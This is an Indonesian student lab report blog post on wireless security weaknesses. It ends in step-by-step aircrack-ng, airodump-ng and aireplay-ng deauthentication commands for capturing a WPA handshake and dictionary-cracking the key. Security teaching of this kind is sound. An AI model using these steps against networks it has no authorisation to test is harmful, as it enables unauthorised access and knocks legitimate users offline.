Senin, 21 Januari 2013

HACKING WIRELESS (INSTALASI LAN)



SITI TOYYIBAH
HACKING WIRELESS
Senin, 21 Januari 2013
XI TKJ B
Bu Chandra & Pa Antoni
SMKN 1 CIMAHI


            
*    TUJUAN
Agar sitswa dapat menyesuaikan dan memahami  materi pembelajaran mengenai wireless , hacking wireless.

*    PENDAHULUAN
Wireless merupakan jaringan tanpa kabel yang menggunakan udara sebagai media transmisinya untuk menghantarkan gelombang elektromagnetik.  Secara umum, tekonologi wireless dapat dibagi menjadi dua:
a.      Berbasis seluler (cellular-based), yaitu solusi yang menggunakan saluran komunikasi cellular atau pager yang sudah ada untuk mengirimkan data. Jangkauan dari cellullar-based biasanya cukup jauh. Contoh teknologinya GSM, CDMA, TDMA, CDPD, GPRS /EDGE, 2G, 2.5G, 3G, UMTS
b.      Wireless LAN (WLAN): yaitu komunikasi wireless dalam lingkup area yang terbatas, biasanya antara 10 sampai dengan 100 meter dari base station k Access Point (AP). keluarga IEEE 802.11 (seperti 802.11b, 802.11a, 802.11g), HomeRF, 802.15 (Personal Area Network) yang berbasis Bluetooth, 802.16 (Wireless Metropolitan Area Network).
Pemakaian teknologi wireless secara umum dibagi atas tanpa pengamanan (nonsecure) dan dengan pengamanan (Share Key/secure). Non Secure (open), yaitu tanpa menggunakan pengaman, dimana computer yang memiliki pancaran gelombang dapat mendengar transmisi sebuah pancaran gelombang dan langsung masuk kedalam network. Sedangkan share key, yaitu alternatif untuk pemakaian kunci atau password. Sebagai contoh, sebuah network yang mengunakan WEP.

KELEMAHAN WIRELESS
Kelemahan jaringan wireless secara umum dapat dibagi menjadi 2 jenis, yakni kelemahan pada konfigurasi dan kelemahan pada jenis enkripsi yang digunakan. Kelemahan tersebut seperti : wireless yang dipasang pada jaringan masih menggunakan setting default bawaan vendor seperti SSID, IP Address , remote manajemen, DHCP enable, kanal frekuensi, tanpa enkripsi bahkan user/password untuk administrasi wireless tersebut:
·        Menyembunyikan SSID (Service Set Identifier)
-         Hanya yang mengetahui SSID yang dapat terhubung ke jaringan
-         Beberapa tools yang dapat digunakan untuk mendapatkan ssid yang dihidden antara lain, kismet (kisMAC), ssid_jack (airjack), aircrack , void11.
·         Keamanan wireless hanya dengan kunci WEP
-         Masalah kunci yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.
-         WEP menggunakan kunci yang bersifat statis
-         Masalah initialization vector (IV) WEP
-          Masalah integritas pesan Cyclic Redundancy Check (CRC-32)
·         WEP terdiri dari dua tingkatan, yakni kunci 64 bit, dan 128 bit. Sebenarnya kunci rahasia pada kunci WEP 64 bit hanya 40 bit, sedang 24bit merupakan Inisialisasi Vektor (IV). Demikian juga pada kunci WEP 128 bit, kunci rahasia terdiri dari 104bit.  Serangan-serangan pada kelemahan WEP antara lain :
1. Serangan terhadap kelemahan inisialisasi vektor (IV), sering disebut FMS attack
2. Mendapatkan IV yang unik melalui packet data yang diperoleh untuk diolah untuk proses cracking kunci WEP dengan lebih cepat. Cara ini disebut chopping attack.
3. Kedua serangan diatas membutuhkan waktu dan packet yang cukup, untuk mempersingkat waktu, para hacker biasanya melakukan traffic injection.

·         Keamanan wireless hanya dengan kunci WPA-PSK atau WPA2-PSK
-         Ada dua jenis yakni WPA personal (WPA-PSK), dan WPARADIUS/ Enterprise.
-         Saat ini yang sudah dapat di crack adalah WPA-PSK, yakni dengan metode brute force attack secara offline.
·         MAC Filtering
-         Pada jaringan wireless, duplikasi MAC adress tidak mengakibatkan konflik. Hanya membutuhkan IP yang berbeda dengan client yang tadi.
-         Bisa diserang dengan arp spoofing

*      ALAT  & BAHAN
-          Backtrack
-          Laptop

*      ISI / LANGKAH KERJA
1.      Install Backtrack terlebih dahulu.
2.      Jalankan terminal dan masukan perintah seperti berikut:
#airmon-ng
#airmon-ng stop wlan0
                
                     
3.    Kemudian masukan perintah seperti berikut ini:
#airmon-ng
#airmon-ng start wlan0



           










 
 
 
 
 
 
4.     Lalu selanjutnya masukan perintah seperti ini:
#airodump-ng wlan0


 


                      
5.       Kemudian masukan perintah ini:
# airodump-ng --channel (channel) --bssid (mac ap) -w (nama file) wlan0
Dan akan masuk pada tampilan seperti ini


 


6.       Lalu masuk dengan perintah seperti ini
#cd /pentest
#cd wireless
#cd aircrack-ng/
#cd test











7.       Lalu masukan perintahnya berikut ini:
#aircrack-ng -w password.lst /root/(nama file)*.cap



                Maka akan muncul tampilan seperti berikut ini:


 


8.       Kemudian masukan perintah
#pwd
 #ls
Untuk melihat posisi kita dimana

 
Kemudian masukan perintah ini
#aireplay-ng --deauth 5 -c (mac client) -a (mac ap) wlan0






Apabila tampilannya seperti itu berarti kita sudah bisa membobol WPA pada wireless dengan SSID whitewspot hotspot.

KESIMPULAN

รจ Meskipun wireless telah memiliki beberapa lapis keamanan. Kita masih dapat melakukan hacking seperti ini. Hal ini menandakan bahwa masih terdapatnya kelemahan dari system keamanan wireless.
                        




Tidak ada komentar:

Posting Komentar